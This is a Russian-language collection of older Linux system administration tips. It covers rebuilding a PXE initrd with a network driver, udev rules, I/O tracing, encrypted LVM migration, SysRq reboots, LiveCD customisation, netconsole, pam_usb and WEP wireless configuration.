Бывают ситуации, когда самый простой способ поставить систему на машину - с использование PXE сервера и FTP/HTTP/NFS. В случае, если в загрузочном образе для PXE отсутствует необходимый драйвер для сетевой карты или SCSI придется его добавлять вручную, пересобирая рамдиск. В данном примере будем добавлять драйвер atl1 в образ Centos 5.3. Далее приведен краткий список шагов и команд. 1. Определение нужного устройства. Загружаемся с PXE и видим, что не обнаружилась сетевая карта Берем образ любой Linux системы, грузимся с него и смотрим вывод lspci. В нашем случае сетевой карточкой оказалось устройство 1969:1048 - сетевая карточка Atheros. Драйвер для этого устройства - atl1e. 2. Собираем на какой-либо машине модуль под то ядро, которое присутствует в образе. Узнать версию, не загружаясь, можно например так: dd if=vmlinuz bs=512 count=1|xxd В моем случае это 2.6.18-128.el5 x86_64. На сборочной машине пакет gcc должен быть той же версии, которой собиралось ядро (здесь это gcc-4.1). Собирается модуль примерно так: # cd /usr/src/kernels/2.6.18-128.el5-x86_64/ # make modules M=/usr/src/atl1-1.2.40.2-1.nodist.rf/ ... LD [M] /usr/src/atl1-1.2.40.2-1.nodist.rf/atl1.ko Здесь /usr/src/atl1-1.2.40.2-1.nodist.rf - директория с исходными кодами модуля, а /usr/src/kernels/2.6.18-128.el5-x86_64/ - с исходными кодами ядра (необходимо поставить соответствующий пакет kernel-devel). 3. Распаковываем рамдиск и добавляем туда модуль: $ mkdir unpack $ cd $_ $ gunzip < /var/lib/tftpboot/centos53/initrd.img | cpio -i --make-directories $ cd modules $ mkdir tmp $ cd $_ $ gunzip < ../modules.cgz|cpio -i --make-directories $ cd 2.6.18-128.el5/x86_64/ $ cp /path/to/atl1.ko . $ cd ../../../ $ mv modules.cgz ~/modules.cgz.saved $ find ./tmp/2.6.18-128.el5/ -print | cpio -o -Hnewc|gzip -c9 > modules.cgz $ rm -rf ./tmp 4. Теперь надо добавить информацию о модуле в файлы modules.alias и module-info: $ /sbin/modinfo /path/to/atl1.ko |grep alias alias: pci:v00001969d00001048sv*sd*bc*sc*i* $ echo $(/sbin/modinfo /path/to/atl1.ko |grep alias) atl1 >> modules.alias Прописываем информацию о модуле в файл module-info, чтобы потом можно было подгрузить драйвер из меню. Добавляем следующие строчки: atl1 eth "Atheros L1 Gigabit Ethernet Driver " 5. Запаковываем рамдиск: $ cd .. $ find . -print | cpio -o -Hnewc|gzip -c9 > ../initrd_updated.img 6. Правим конфигурацию pxelinux, подкладываем в папку с образами новый рамдиск и ставим систему.

Фиксация номеров устройств для нескольких одинаковых карт в Linux (доп. ссылка 1) Автор: silverghost [комментарии]

Проблема: Несколько DVB карт при перезагрузке менялись местами в произвольном порядке. Решение: зафиксировать эти карты на своих местах через написание udev правила. Итак, смотрим параметры каждой из карт: udevinfo -a -n /dev/dvb/adapter0/frontend0 looking at device '/class/dvb/dvb0.frontend0': KERNEL=="dvb0.frontend0" SUBSYSTEM=="dvb" DRIVER=="" looking at parent device '/devices/pci0000:00/0000:00:1e.0/0000:02:00.0': KERNELS=="0000:02:00.0" SUBSYSTEMS=="pci" DRIVERS=="b2c2_flexcop_pci" ATTRS{vendor}=="0x13d0" ATTRS{device}=="0x2103" ATTRS{subsystem_vendor}=="0x13d0" ATTRS{subsystem_device}=="0x2103" ATTRS{class}=="0x028000" ... Создаем файл /etc/udev/rules.d/10-local.rules с содержимым (фиксация по параметру "KERNELS"): SUBSYSTEM=="dvb", KERNELS=="0000:02:00.0", PROGRAM="/bin/sh -c 'K=%k; K=$${K#dvb}; printf dvb/adapter0/%%s $${K#*.}'", NAME="%c", GROUP="video" SUBSYSTEM=="dvb", KERNELS=="0000:02:02.0", PROGRAM="/bin/sh -c 'K=%k; K=$${K#dvb}; printf dvb/adapter1/%%s $${K#*.}'", NAME="%c", GROUP="video"

Простой способ ограничения утилизации CPU для заданного процесса [комментарии]

В репозиториях популярных Linux дистрибутивов можно найти полезную утилиту cpulimit (http://cpulimit.sourceforge.net/), которая позволяет легко ограничить занимаемые определенной программой процессорные ресурсы. Метод работы программы оригинален, в зависимости от указанного процента допустимой нагрузки, процесс периодически останавливается через отправку сигнала SIGSTOP, а затем работа возобновляется через SIGCONT. Например, ограничиваем потребление CPU для работающей программы find в 30%. Определяем идентификатор процесса: $ ps -aux|grep find user 3470 7.0 7.9 25516 16252 ? Sl 17:05 14:19 /usr/bin/find Ограничиваем: $ cpulimit --pid 3470 --limit 30 На многопроцессорных системах, процент нужно указывать с учетом числа CPU, т.е. для 4 процессорной машины для указания работы без ограничений нужно поставить не 100%, а 400%.

Как узнать поддерживается ли PCI устройство в заданном Linux ядре (доп. ссылка 1) [комментарии]

Для определения какие доступные модули ядра подходят для установленных в текущей системе PCI плат, нужно запустить утилиту pcimodules, которая для сопоставления модулей ядра и идентификаторов PCI плат использует содержимое файла /lib/modules/версия_ядра/modules.pcimap, автоматически генерируемого на этапе выполнения команды depmod. Полный список всех поддерживаемых PCI идентификаторов можно найти в файле /usr/share/hwdata/pci.ids Обновить базу pci.ids можно выполнив команду: update-pciids Для просмотра всех PCI устройств в системе нужно использовать утилиту lspci (lspci -vvv для детального вывода). Для вывода информации, какой драйвер можно использовать для каждого устройства в системе: lspci -k Рассмотрим по шагам процесс определения присутствия поддержки имеющейся аудио платы в текущем Linux ядре. Смотрим параметры платы: lspci | grep -i audio 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller Видим, что идентификатор платы 00:1b.0. Далее, выводим для этого идентификатора более подробную информацию: lspci -n | grep 00:1b.0 00:1b.0 0403: 8086:27d8 (rev 01) где, 00:1b.0 - код устройства; 8086 - код производителя (Intel Corporation) 27d8 - идентификатор модели. Проверяем какие модули ядра поддерживают данную модель: grep 27d8 /lib/modules/$(uname -r)/modules.pcimap snd-hda-intel 0x00008086 0x000027d8... Смотрим информацию о драйвере: modinfo snd-hda-intel filename: /lib/modules/2.6.27-11-server/kernel/sound/pci/hda/snd-hda-intel.ko description: Intel HDA driver depends: snd-pcm,snd-page-alloc,snd

Трассировка ввода/вывода в Linux (доп. ссылка 1) [комментарии]

Утилита blktrace (присутствует в репозиториях Ubuntu и Debian) позволяет проконтролировать какие именно данные передаются для заданного блочного устройства. Например, посмотреть общую статистику и детали обмена данными с /dev/sda можно выполнив команду: blktrace -d /dev/sda -o - | blkparse -i - где, blkparse фильтр для наглядного представления результатов. В случае вывода ошибки про отсутствие /sys/kernel/debug, убедитесь, что смонтирована debugfs: mount -t debugfs debugfs /sys/kernel/debug В качестве альтернативы можно предложить задействование механизма /proc/sys/vm/block_dump, при записи 1 в этот файл начнется сбор данных, при записи 0 - результаты будут выведены в буфер dmesg. Скрипт для упрощения разбора данных можно загрузить здесь: http://www.digitalprognosis.com/opensource/scripts/top-disk-users Мониторинг ввода/вывода не на уровне планировщика, а на уровне конечных процессов удобно проводить при помощи утилиты iotop (http://guichaz.free.fr/iotop/)

Слежение за изменением файлов и директорий в Linux shell [комментарии]

Пакет inotify-tools содержит две полезные утилиты: inotifywait - ожидать наступления определенного события в файле или дирекотории. inotifywatch - слежение за статистикой изменений и вывод суммарных данных. Утилиту inotifywait удобно использовать в скриптах, например, когда нужно дождаться завершения внешней операции с файлом и мгновенно среагировать на изменения. Напрмер, запустим: inotifywait /tmp При попытке создать файл в /tmp утилита завершит работу, выдав: /tmp/ CREATE,ISDIR v31549 При попытке создать директорию: /tmp/ CREATE,ISDIR 0 Если необходимо следить за изменением во всех директориях в пределах /tmp, следует использовать флаг рекурсивного контроля "-r". Для больших директорий может понадобиться расширить лимит /proc/sys/fs/inotify/max_user_watches. Используя опцию "--fromfile" можно загрузить список контролируемых файлов и директорий из файла. Опция "-e" позволяет реагировать только на определенный тип события, например, на удаление файла, игнорируя создание и открытие. Опция '-m' отменяет мгновенный выход после наступления события, что позволяет организовать визуальное наблюдение или обработку в цикле. Пример, скрипта для обработки изменения файла: #!/bin/sh inotifywait -e delete -m /tmp/lock/ | while read dir events file; do echo "Removed $dir$file" done При выполнении: inotifywatch /tmp и последующем завершении выполнения через задание таймаута или нажатия ctrl+c, будет выведена суммарная информация по каждому из классов событий, напрмер: total modify close_write close_nowrite open create delete filename 22 3 4 1 5 4 5 /tmp/ Или inotifywatch -v -e access -e modify -t 60 -r /var/log через 60 секунд выдаст: 14 14 /var/log/ 2 2 /var/log/apache2 4 4 /var/log/postgresql Что касается кроссплатформенного решения, которое работает, не только в Linux, но и во FreeBSD, можно привести пример слежения за изменением файла используя Perl модуль EV (http://search.cpan.org/dist/EV/), использующий универсальную библиотеку-враппер libev: #!/usr/bin/perl use strict; use EV; # Следим за изменениями в директории /tmp/watch # 0 - интервал опроса по умолчанию my $w = EV::stat "/tmp/watch", 0, sub { my ($w, $revents) = @_; warn $w->path, " has changed somehow.".$w->attr."\n"; $w->stop; # На время обработки события, прекращаем прием нотификаций. ..... $w->start; }; EV::loop;

Как распаковать ядро Linux из bzImage (доп. ссылка 1) Автор: bappoy [комментарии]

Воспользоваться программой binoffset из исходников Linux-ядра: gcc -o binoffset /usr/src/linux/scripts/binoffset.c dd if=bzImage skip=`./binoffset bzImage 0x1f 0x8b 0x08 0x00` bs=1|gzip -d > vmlinux В файле vmlinux получаем распакованное ядро. Из него можно извлечь, например, версию компилятора, использованного при сборке ядра: strings vmlinux|grep "^Linux version"

Миграция на файловую систему LVM с поддержкой шифрования в Debian linux (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Администрирование Debian: How To по миграции на файловую систему LVM с поддержкой шифрования Целью данного документа является описание пути перехода на полностью шифрованную файловую систему LVM (корневая файловая система и пользовательские данные, кроме загрузочного раздела). Миграция возможна как с обычной LVM, так и с ext3. Все, что вам понадобится - наличие внешнего хранилища. Отдельно стоит отметить, что данная операция должна проводиться человеком, имеющим некоторый опыт. ЧАСТЬ 1. Установка необходимого ПО и сохранение текущей системы. Есть два способа реализации Full Encrypted LVM (далее - FELVM). a) Debian way (TM), где LVM размещаетя на зашифрованном виртуальном устройстве (cryptsetup). b) Другой путь, когда LVM создается на физическом устройстве, а затем шифруются логические разделы. Конечно, я выбираю debian way, хотя никаких определенных причин для этого нет. В качестве исходных данных у меня имеется /dev/hda1 типа Windows NTFS и несколько других разделов, тип которых не важен, так как их скоро не останется. Перед тем, как мы начнем, рекомендую сделать полную копию ваших данных на внешний носитель с помощью CloneZilla, чтобы потом не иметь бледный вид. Для начала установим 'cryptsetup'. Также ядро должно ключать образ initrd для загрузки. Если это не так, установите пакет initramfs-tools. Затем создайте следующий файл в каталоге /etc/initramfs-tools/conf.d: filename: cryptroot contents: target=lukspace,source=/dev/hda3,key=none,lvm=vg-root Затем выполните команду: # update-initramfs -u Она создаст образ initrd, который будет знать, где находятся шифрованные разделы после создания. Создадим, и это обязательно, tar архив вашей системы на внешний носитель: # tar cSjf /my/external/storage/sysbackup.tar.bz2 /bin/ /boot/ \ /etc/ /home/ /lib/ /opt/ /root/ /sbin/ /selinux/ /srv/ /usr/ /var/ Если вы хотите повысить скорость выполнения данной операции, уберите флаг 'j' и расширение bz2. Это позволит сохранить все права доступа, файлы, владельцев файлов и т.д. Как вы можете заметить, я пропустил каталоги /dev/, /media, /mnt, /proc, /sys, /tmp, так как они будут вновь созданы на новой системе (кроме /media). Я подразумеваю, что никаких действий в системе после сохранения не производится - не открываются консоли и сессии X window, кроме корневой. Настало время получить данные с внешних хранилищ. Будем считать, что оно примонтировано в /media/abyss. Конечно, /media так же содержит cdrom и прочие полезные вещи. # tar cSjf /my/external/storage/databackup.tar.bz2 /media/cdrom /media/whatever /media/... Все ЗА ИСКЛЮЧЕНИЕМ точки монтирования внешнего хранилища! Теперь мы защищены от любых ошибок при конфигурировании. ЧАСТЬ 2. Переформатирование диска и создание структуры FELVM. Помните: если дела приняли дурной оборот - вы всегда можете восстановиться с помощью clonezilla. Я использую clonezilla CD для большинства работ, где мне нужен live CD. Загружаем Clonezilla, настраиваем сеть. Затем в консоли (sudo su) выполняем команды: # aptitude update && aptitude dist-upgrade Возможно перед этим вам понадобится выполнить что-то подобное: # ifconfig eth0 up # dhclient eth0 После того, как live CD обновит ПО нужно установить следущее: # aptitude install cryptsetup joe Joe - мой любимый редактор, поэтому далее мы будем считать, что и ваш тоже. Очищаем диск! # cfdisk /dev/hda и удаляем все разделы за исключением /dev/hda1 (NTFS). Создаем раздел, с которого будет осуществляться загрузка: /dev/hda2 размером 200 MB. Затем создаем другой раздел, занимающий все свободное пространство(/dev/hda3). Его в последствии будет занимать rootfs и данные. Записываем таблицу разделов на диск и выходим. Мы все поломали, но не стоит волноваться, все будет восстановлено с tar архивов. Окончательно удаляем наши данные, заполняя все случайными последовательностями, заодно проверяя наличие badblock: # badblocks -s -w -t random -v /dev/hda2 # badblocks -s -w -t random -v /dev/hda3 На выполнение этих команд требуется время, так что будьте терпеливы. Создаем файловую систему на загрузочном разделе: # mkfs.ext3 /dev/hda2 Используя cryptsetup создадим большой раздел как устройство dm-crypt. Это очень просто: # cryptsetup -y -s 256 -c aes-cbc-essiv:sha256 luksFormat /dev/hda3 Я не буду приводить объяснение всех опций, если хотите - посмотрите сами. Обязательно выберите хорошее ключевое слово, которое вы сможете запомнить. Позже вы сможете сменить его или сделать несколько ключевых слов. Подошло время использовать инициализированное пространство: # cryptsetup luksOpen /dev/hda3 lukspace Эта команда спросит у вас ранее введенное ключевое слово и сделает доступным /dev/mapper/lukspace. Это может быть расценено как устройство, готовое принять любой вид данных. Вы можете форматировать его в ext3 или построить LVM, чем мы сейчас и займемся. Создаем LVM: # pvcreate /dev/mapper/lukspace # vgcreate vg /dev/mapper/lukspace # lvcreate -L10G -nroot vg # lvcreate -l 100%FREE -nmyspace vg Так мы получим логический том LVM /dev/vg/root для корневой файловой системы и /dev/vg/myspace для наших данных. Это было несложно, не так ли? Дальше еще проще: # mkfs.ext3 /dev/vg/root # mkfs.ext3 /dev/vg/myspace ЧАСТЬ 3. Восстановление системных файлов и загрузка новой системы. После того, как вы создадите место для корневой файловой системы, настанет пора разархивировать туда наши данные. Сперва создадим точку монтирования, которую назовем /media/rootfs и затем: # mount /dev/vg/root /media/rootfs а теперь: # cd /media/rootfs # tar xSjf /external_storage/sysbackup.tar.bz2 После чего ждем завершения процесса. Создаем каталоги, которые не были сархивированы: # mkdir proc sys media dev tmp mnt # chmod 1777 tmp Теперь создаем точку монтирования bootfs и монтируем к ней будущий загрузочный раздел: # mkdir bootfs # mount /dev/hda2 bootfs Затем перемещаем загрузочные файлы из rootfs/boot в bootfs. Теперь /dev/hda2 содержит все необходимые для загрузки файлы. И последнее - изменим файл fstab в rootfs/etc таким образом, чтобы указать новое устройство /dev/vg/root. Перезагружаемся. После загрузки grub нажимаем 'e' для редактирования опций ядра и указания правильного root=..., чтобы машина могла загрузиться. Хочется надеяться, что LUKS спросит у вас кодовое слово, и все пойдет хорошо! После того, как вы наиграетесь с вашей зашифрованной системой, отредактируйте /boot/grub/menu.lst для указания корректного устройства root=... и запустите update-grub. Giorgos Pallas

Настройка клавиатуры для Xorg при работающем hal-0.5.10 (доп. ссылка 1) Автор: Kroz [комментарии]

Решение представлено для Gentoo, но возможно проблема актуальна и для других дистрибутивов. При обновлении hal до версии 0.5.10 перестает нормально работать клавиатура. По множественным отзывам в Сети, у всех перестает работать преключатель раскладки, у меня еще были глюки с другими клавишами (например кнопка "вверх" работала как PrtScr и др.) Для начала приведу часть xorg.conf который у меня работал испокон веков: Section "InputDevice" Identifier "Chicony" Driver "kbd" Option "Protocol" "Standard" Option "XkbModel" "pc105" Option "XkbRules" "xorg" Option "XkbLayout" "us,ru,ua" Option "XkbVariant" ",winkeys" Option "XkbOptions" "grp:lwin_toggle,grp_led:scroll" Option "AutoRepeat" "250 30" EndSection Причина того, что эта конфигурация отвалилась, состоит в том, что новая версия hal просто игнорирует конфиг xorg.conf. Нашел два метода решения проблемы. Первый метод: http://ru.gentoo-wiki.com/HOWTO_hal_и_устройства_ввода Смысл в том, что создается файл политики hal, который содержит конфигурацию клавиатуры: /usr/share/hal/fdi/policy/20thirdparty/10russian-layout.fdi Учитывая, что в статье есть небольшие ошибки, приведу свой файл конфигурации. Рекомендую сопоставлять с приведенным выше xorg.conf <?xml version="1.0" encoding="ISO-8859-1"?> <match key="info.capabilities" contains="input.keyboard"> <merge key="input.x11_driver" type="string">kbd</merge> <merge key="input.xkb.model" type="string">pc105</merge> <merge key="input.xkb.rules" type="string">xorg</merge> <merge key="input.xkb.layout" type="string">us,ru</merge> <merge key="input.xkb.variant" type="string">,winkeys</merge> <merge key="input.xkb.options" type="strlist">grp:lwin_toggle,grp_led:scroll</merge> </match> Думаю смысл понятен. После создания файла следует пергрузить hald и перегрузить иксы. Недостаток этого метода состоит в том, что я так и не смог настроить переключение трех языков. Второй метод: Второй метод состоит в том, что мы отключаем автоопределение устройств. Для этого в xorg.conf в секцию ServerLayout дописываем Option "AutoAddDevices" "False". После перегрузки иксов настройки клавиатуры берутся из xorg.conf. Подозреваю, что у второго метода есть свои недостатки, но я их пока не обнаружил.

Перезагрузка Linux машины через SysRQ (доп. ссылка 1) Автор: DoktorPZ [комментарии]

Иногда возникает ситуация, когда удаленно, по ssh например, нужно перезагрузить linux сервер. Команды reboot, shutdown не работают так как нужно, то есть просто висят в процессах, но машина не уходит в перезагрузку. Такое часто бывает, когда отказывает диск, или начинаются проблемы с RAID массивом. Для форсирования перезагрузки сервера нам подойдет sysrq. Для начала включаем sysrq через proc: echo 1 > /proc/sys/kernel/sysrq Далее посылаем нужную команду в sysrq триггер: echo b > /proc/sysrq-trigger Как показывает практика, машина мгновенно уходит в reboot.

Уменьшение размера стандартного LiveCD Fedora 7 (доп. ссылка 1) [комментарии]

Задача ужать стандартный GNOME-LiveCD Fedora7 до 400 Мб. Ниже журнал действий. 1. Извлекаем из iso образа LiveCD squashfs.img. mount -o loop ./Fedora-7-Live-i686.iso /mnt/cdrom копируем все в отдельную директорию директорию /mnt/disk/LiveCD/newcd umount /mnt/cdrom 2. Монтируем squashfs.img и извлекаем из него os.img mount -o loop -t squashfs /mnt/disk/LiveCD/newcd/squashfs.img /mnt/cdrom копируем содержимое в /mnt/disk/LiveCD/new_ext3 umount /mnt/cdrom 3. Монтируем ext3 образ /mnt/disk/LiveCD/new_ext3/os.img mount -o loop /mnt/disk/LiveCD/new_ext3/os.img /mnt/disk/LiveCD/new_ext3/sysroot 4. Удаляем лишнее и устанавливаем недостающее. chroot /mnt/disk/LiveCD/new_ext3/sysroot /bin/sh su - mount /proc mount /sys rm -rf /usr/share/doc в /usr/share/locale/ - оставляем только русские и английские локали cd /usr/share/icons; rm -rf Bluecurve gnome В /usr/share/pixmaps заменяем недостающее, чистим pixmaps/backgrounds/ копируем свою фоновую картинку cp background.jpg /usr/share/gdm/themes/FedoraFlyingHigh cp background.jpg /usr/share/backgrounds/images/default.jpg Чистим /usr/share/backgrounds Удаляем пакеты с китайскими шрифтами: rpm -e fonts-chinese fonts-arabic fonts-korean fonts-japanese Если rpm ругается, делаем "rpm --rebuilddb" Если нужно создать какие-то директории или произвести действия в момент старта livecd правим fedora-live в /etc/rc.d/init.d Ставим желаемые пакеты, например, конфигуратор PPTP: rpm -Uvh http://pptpclient.sourceforge.net/yum/stable/fc7/pptp-release-current.noarch.rpm yum --enablerepo=pptp-stable install pptpconfig .... umount /proc umount /sys 5. После приведения os.img в нужный вид, создаем новый пустой os.img и копируем содержимое старого (нужно забить образ нулями, чтобы он лучше сжался, иначе изменения будут только в метаданных и итоговый образ squashfs после сжатия получиться больше чем начальный). cd mnt/disk/LiveCD/new_ext3 dd if=/dev/zero of=new_os.img bs=1k count=4096k /sbin/mkfs.ext3 -F -L "LiveCD" -m 1 new_os.img /sbin/tune2fs -c0 -i0 -Odir_index -ouser_xattr,acl new_os.img Монтируем новый образ mkdir /mnt/disk/LiveCD/new_ext3/new_sysroot mount -o loop ./new_os.img /mnt/disk/LiveCD/new_ext3/new_sysroot Копируем содержимое старого через rsync, чтобы сохранить расширенные атрибуты файлов. rsync -a -v --acls --xattrs --hard-links /mnt/disk/LiveCD/new_ext3/sysroot /mnt/disk/LiveCD/new_ext3/new_sysroot незабываем размонтировать и переименовать новый образ umount /mnt/disk/LiveCD/new_ext3/sysroot umount /mnt/disk/LiveCD/new_ext3/new_sysroot rm /mnt/disk/LiveCD/new_ext3/new_sysroot mv /mnt/disk/LiveCD/new_ext3/new_os.img /mnt/disk/LiveCD/new_ext3/os.img 6. Сжимаем ext3 образ rm /mnt/disk/LiveCD/newcd/squashfs.img cd /mnt/disk/LiveCD/new_ext3/ /sbin/mksquashfs os.img sysroot /mnt/disk/LiveCD/newcd/squashfs.img 7. Создаем iso образ для записи на CD: mkisofs -o ./live.iso -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 \ -boot-info-table -J -r -hide-rr-moved -V "Fedora-7-Live-i386" /mnt/disk/LiveCD/newcd/ Если появится желание изменить метку диска Fedora-7-Live-i386, не забудьте поменять ее в isolinux/isolinux.cfg

VMWare Workstation 6 для отладки ядра Linux (доп. ссылка 1) Автор: Тарасенко Николай [комментарии]

Недавно была добавлена интересная особенность в Workstation 6.0, которая делает WS6 отличным средством для отладки ядра Linux. Теперь можно с легкостью отлаживать Linux VM на хосте при помощи gdb без каких-либо изменений в Guest VM. Ни каких kdb, перекомпиляций или еще одной машины не требуется. Все что вам потребуется, так это всего одна строчка в VM'шном конфигурационном файле. Чтобы использовать новую особенность, необходимо достать последний билд WS6: http://www.vmware.com/products/beta/ws/ Разместить в вашем Linux VM конфигурационном файле строчку: debugStub.listen.guest32=1 Теперь, всякий раз, когда вы запускаете виртуальную машину, Вы будете видеть на хост консоле: VMware Workstation is listening for debug connection on port 8832. Запустите gdb на хосте, ссылаясь на ядро, для которого у Вас есть System.map и присоедините его к виртуальной машине: % gdb (gdb) file vmlinux-2.4.21-27.EL.debug (gdb) target remote localhost:8832

Сетевая консоль для отладки зависаний Linux (доп. ссылка 1) Автор: niol, debian-administration.org [комментарии]

Модуль Linux ядра netconsole позволяет экспортировать консоль на другую машину по сети, что полезно для отладки ситуации зависания Linux без вывода диагностики в лог и на экран (например, X-ы зависли). В /etc/modprobe.d/ создаем файл или добавляем в /etc/modules.conf: options netconsole netconsole=32769@192.168.1.1/eth1,32769@192.168.1.6/01:23:34:56:78:9A где, 192.168.1.1:32769 сетевой адрес и порт на eth1 интерфейсе локальной машины, с которого будет производится отправка пакетов. 192.168.1.6:32769 сетевой адрес, порт и MAC адрес удаленной машины куда будет экспортирована консоль. На удаленной машине 192.168.1.6, для доступа к консоли используем netcat: nc -l -p 32769 -u Подгружаем модуль netconsole: modprobe netconsole

Как минимизировать проблемы при перезагрузке зависшего Linux (доп. ссылка 1) Автор: arsgeek.com [комментарии]

Если консоль зависла, машина работает, но не откликается на CTRL-ALT-BKSPC, ALT-CTRL-F1, CTRL-ALT-DEL и по сети зайти на машину тоже нет возможности. "ALT + SysReq + r" - перевести клавиатуру в Raw режим. "ALT + SysReq + s" - сбросить буферы FS на диск (может занять много времени, если система сильно загружена). "ALT + SysReq + e" - отправить сигнал завершения работы процессам. "ALT + SysReq + i" - принудительно убить процессы не желающие завершить работу по сигналу KILL. 'ALT + SysReq + u' - отмонтировать дисковые разделы. 'ALT + SysReq + b' - перезагрузить машину. PS. Клавиша SysReq совпадает с Print Screen.

Обновляем BIOS с загрузкой DOS по сети Автор: Андрей [комментарии]

Необходимо загрузить образ DOS по сети. 1. создаем образ: dd if=/dev/zero of=floppy288.img bs=1024 count=2880 mkdosfs floppy288.img ms-sys -1 -f floppy288.img mount -o loop floppy288.img /mnt/floppy cp msdos.sys /mnt/floppy cp io.sys /mnt/floppy cp command.com /mnt/floppy umount /mnt/floppy 2. создаем файл загрузчика PXE: label linux kernel dos/memdisk append initrd=dos/floppy288.img Все, далее можно грузиться по сети, и предварительно скопировать в образ утилиты для обновления биос. Файл memdisk bp из пакета syslinux, из дистрибутива. Утилита ms-sys на sourceforge.net

Как собрать отключенный в конфигурации Linux 2.6 ядра модуль (доп. ссылка 1) [комментарии]

Чтобы собрать только один модуль входящий в комплект ядра, но отключенный в конфигурации, без пересборки остальных частей (на примере ntfs): make CONFIG_NTFS_FS=m CONFIG_NTFS_DEBUG=n CONFIG_NTFS_RW=n M=fs/ntfs

Аутентификация без пароля через USB Flash в Linux (доп. ссылка 1) [комментарии]

Цель - организовать аутентификацию пользователя в Linux системе, не через ввод пароля, а через вставку USB флэша или CDROM, содержащего DSA ключ. 1. Устанавливаем pam_usb (http://pamusb.sourceforge.net/); 2. В /etc/pam.d/login, /etc/pam.d/xdm и т.д. прописываем, в зависимости от режима: 2.1. Вход только при вставке Flash с ключем: auth required pam_usb.so #auth required pam_unix.so # комментируем строку. 2.2. Можем войти просто вставив Flash или набрав пароль: auth sufficient pam_usb.so # ставим перед "auth required pam_unix.so" 2.3. Режим входа только при вставке Flash с ключем одновременно с вводом пароля: auth required pam_usb.so # ставим перед "auth required pam_unix.so" 3. Монтируем Flash в /mnt/usb и генерируем для пользователя ключ: usbadm keygen /mnt/usb логин 1024

Синхронизация Smartphone Motorola MPx200 под Linux (доп. ссылка 1) [комментарии]

Есть два способа как заставить MPX200 работать с Linux: IrDA и wince-usb. 1. Подключение через IrDA (SIR): Устанавливаем параметры для SiR порта /bin/setserial /dev/ttyS1 port 0x6f8 irq 3 uart 8250 baud_base 115200 irattach /dev/ttyS1 -s Для RedHat-based Linux дистрибутивов делаем проще: В /etc/sysconfig/irda IRDA=yes DEVICE=/dev/ttyS1 DISCOVERY=yes # service irda start Запускем демон синхронизации (не из под root). Качаем с http://synce.sourceforge.net $ dccm Если используется пароль запускаем как "dccm -p пароль" Один раз указываем используемый порт. # synce-serial-config ircomm0 Стартуем pppd (про hotplug, ниже) # synce-serial-start Проверяем. $ pstatus Version ======= Version: 4.20.0 (Microsoft Windows Mobile 2003 for Pocket PC Phone Edition (?)) Platform: 3 (Windows CE) ..... Завершаем сеанс # synce-serial-abort 2. Подключение по USB. Для 2.4.x ядра используем user space драйвер wince-usb http://cvs.sourceforge.net/viewcvs.py/synce/wince-usb/ + http://libusb.sourceforge.net (последние 2.6.x ядра должны работать с модулями ipaq и usb-serial из коробки). Патчим. В самом начале ipaqd.c меняем значения IPAQ_ENDPOINT на #define IPAQ_ENDPOINT_IN 0x82 #define IPAQ_ENDPOINT_OUT 0x02 Далее в devlist[] добавляем { 0x045e, 0x00ce, "Motorola MPX200" }, Создаем /usr/local/bin/cebox.sh взяв пример из README к wince-usb, например: #!/bin/sh /usr/sbin/pppd nocrtscts local debug passive silent 192.168.1.1:192.168.1.2 ms-dns 192.168.1.1 noauth proxyarp $ dccm Подключаем телефон и сразу запускаем # rmmod ipaq (пока не поправили hotplug) # ipaqd 2>/var/log/ipaqd.log Далее запускаем synce-serial-* как в предыдущем шаге. 3. Настройка HotPlug (чтобы все запускалось автоматически). В /etc/hotplug/usb.agent добавляем после блока с "LABEL="USB product $PRODUCT": if [ "$PRODUCT" = "45e/ce/0" ]; then /etc/hotplug/usb/ipaq exit 0 fi Создаем /etc/hotplug/usb/ipaq #!/bin/bash killall -9 ipaqd killall dccm su -c /usr/bin/dccm /user/ /usr/local/bin/ipaqd 2>/var/log/ipaq.log 4. Стандартные команды synce: pcp - копирование файлов (аналог cp) pls - список файлов в директории (аналог ls) pmkdir - создание директории (аналог mkdir) pmv - перенос/переименование файлов (аналог mv) prm - удаление файлов (аналог rm) prmdir - удаление директорий prun - запуск программы на устройстве pstatus - статус устройства synce-install-cab - установка на устройство .cab файла orange - позволяет выдрать .cab из .exe инсталлера; В Modnight Commander удобно использовать VFS понимающую команды "cd #synce" и "cd #synceroot", правда модуль раздаваемый на сайте synce у меня не заработал, пришлось его переписать: ftp://ftp.opennet.ru/pub/sys/shell/synce-mcfs-patched/ Для работы, копируем файлы synce и synceroot в /usr/lib/mc/extfs К extfs.ini добавляем: synce synceroot Хорошая графическая оболочка для синхронизации календаря и адресной книги - MultiSync (http://multisync.sourceforge.net/)

Включение поддержки PAM в Slackware Linux (доп. ссылка 1) Автор: Zebr [комментарии]

Берём: Slackware http://www.kernel.org/pub/linux/libs/pam/pre/library/ http://www.kernel.org/pub/linux/utils/util-linux/ ftp://ftp.pld.org.pl/software/shadow/ Собираем PAM: ./configure make make install Собираем util-linux редактируем в MCONFIG переменную HAVE_PAM=yes После чего стандартно ./configure make make install Собираем shadow ./configure --with-libpam make make install Система авторизации готова описание подключаемых модулей в /etc/pam.conf PS взято с http://linio.boo.pl/ тамошний конфиг (мне не особо понравился) http://linio.boo.pl/pam_linio.conf

Подключение к беспроводной сети под Linux (доп. ссылка 1) [комментарии]

0. Убеждаемся, что наш беспроводной адаптер в списке поддерживаемых в Linux (http://www.linux-wlan.org/docs/wlan_adapters.html.gz) на сайте http://www.linux-wlan.org/ 1. Подгружаем модуль ядра: insmod prism2_usb 2. Активируем wlan0 wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable 3. Устанавливаем SSID для используемой сети wlanctl-ng wlan0 lnxreq_autojoin ssid=stayoutofmynet authtype=opensystem 4. Выставляем атрибуты WEP wlanctl-ng wlan0 lnxreq_hostwep encrypt=true decrypt=true wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11PrivacyInvoked=true 5. Используем WEP ключ wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11WEPDefaultKeyID=3 wlanctl-ng wlan0 dot11req_mibset mibattribute=dot11WEPDefaultKey3=12:34:56:78:9A 6. Конфигурируем IP ifconfig wlan0 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 route add default gw 192.168.1.11

Настройка параметров последовательного порта в Gentoo Linux (доп. ссылка 1) Автор: Roman A Egunkov [комментарии]

